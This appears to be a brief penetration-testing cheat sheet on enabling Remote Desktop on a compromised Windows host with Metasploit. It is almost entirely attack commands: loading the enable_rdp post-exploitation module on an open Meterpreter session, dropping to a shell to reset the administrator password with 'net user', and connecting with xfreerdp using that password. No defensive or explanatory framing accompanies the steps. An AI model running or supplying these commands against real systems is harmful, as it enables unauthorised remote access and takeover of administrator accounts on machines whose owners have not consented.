Enable RDP with metasploit

  • Post


RDP use default port: 3389

  • Exploit the target
  • Open a meterpreter session

 

use post/windows/manage/enable_rdp
set SESSION 1
exploit

 

  • Change the administrator password
sessions -i 1
shell
net user administrator Passw0rd_123
  • Login in RDP
​ xfreerdp /u:administrator /p:Passw0rd_123 /v:x.x.x.x